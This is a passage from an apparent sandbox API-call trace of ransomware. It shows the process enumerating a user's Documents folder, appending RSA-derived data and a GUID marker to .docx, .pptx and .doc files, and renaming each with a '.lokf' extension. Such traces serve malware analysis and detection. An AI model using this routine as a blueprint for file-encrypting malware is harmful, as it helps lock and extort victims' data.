KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.894] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.894] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.895] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.895] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.895] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.895] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.895] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.895] GetLastError () returned 0x0 [0058.895] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.895] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.895] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.895] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.895] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.895] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.895] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.895] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.896] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x175f8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.896] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.896] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.896] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.896] CloseHandle (hObject=0x5cc) returned 1 [0058.897] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0058.897] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.897] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jcZ5HOv.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jcz5hov.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jcZ5HOv.docx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jcz5hov.docx.lokf")) returned 1 [0058.899] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49d48050, ftCreationTime.dwHighDateTime=0x1d544aa, ftLastAccessTime.dwLowDateTime=0x89941f80, ftLastAccessTime.dwHighDateTime=0x1d52366, ftLastWriteTime.dwLowDateTime=0x89941f80, ftLastWriteTime.dwHighDateTime=0x1d52366, nFileSizeHigh=0x0, nFileSizeLow=0x1a39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jFhfFrSxF58Y6JuYP.pptx", cAlternateFileName="JFHFFR~1.PPT")) returned 1 [0058.899] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.899] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0058.899] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jFhfFrSxF58Y6JuYP.pptx") returned=".pptx" [0058.899] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jFhfFrSxF58Y6JuYP.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jfhffrsxf58y6juyp.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.899] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=6713) returned 1 [0058.899] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.901] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1a13, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.901] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.902] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x1a39, lpOverlapped=0x0) returned 1 [0058.902] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.902] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.902] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.902] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.903] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.903] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.903] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.903] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.903] GetLastError () returned 0x0 [0058.903] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.903] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.903] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.903] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.903] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.903] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.903] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.904] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1a39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.904] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.904] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.904] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.904] CloseHandle (hObject=0x5cc) returned 1 [0058.904] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.904] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.905] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jFhfFrSxF58Y6JuYP.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jfhffrsxf58y6juyp.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jFhfFrSxF58Y6JuYP.pptx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jfhffrsxf58y6juyp.pptx.lokf")) returned 1 [0058.906] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x625aa6a0, ftCreationTime.dwHighDateTime=0x1d4d366, ftLastAccessTime.dwLowDateTime=0x7a991140, ftLastAccessTime.dwHighDateTime=0x1d4c559, ftLastWriteTime.dwLowDateTime=0x7a991140, ftLastWriteTime.dwHighDateTime=0x1d4c559, nFileSizeHigh=0x0, nFileSizeLow=0x6ee6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lJq7q-PX9DWbR8t8z.doc", cAlternateFileName="LJQ7Q-~1.DOC")) returned 1 [0058.906] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.906] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0058.906] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lJq7q-PX9DWbR8t8z.doc") returned=".doc" [0058.906] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lJq7q-PX9DWbR8t8z.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ljq7q-px9dwbr8t8z.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.906] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=28390) returned 1 [0058.906] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.908] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x6ec0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.908] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.909] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.909] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x6ee6, lpOverlapped=0x0) returned 1 [0058.909] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.909] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.909] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.909] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.909] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.910] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.910] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.910] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.910] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.910] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.910] GetLastError () returned 0x0 [0058.910] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.910] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.910] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.910] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.910] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.910] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.910] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.910] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.911] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x6ee6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.911] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.911] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.911] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.911] CloseHandle (hObject=0x5cc) returned 1 [0058.919] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.919] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.919] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lJq7q-PX9DWbR8t8z.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ljq7q-px9dwbr8t8z.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lJq7q-PX9DWbR8t8z.doc.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ljq7q-px9dwbr8t8z.doc.lokf")) returned 1 [0058.920] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0058.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0058.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269a18 [0058.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa8) returned 0x3201650 [0058.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bb38 [0058.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0058.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b3e8 [0058.920] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0058.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0058.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269a18 [0058.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0058.920] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0058.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0058.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269a18 [0058.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xfc) returned 0x326a688 [0058.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b860 [0058.921] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0058.921] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bad0 [0058.921] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.921] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269bf8 [0058.921] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b80 [0058.921] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0058.921] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0058.921] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269a18 [0058.921] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269478 [0058.921] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0058.921] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0058.921] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269a18 [0058.921] RtlAllocateHeap 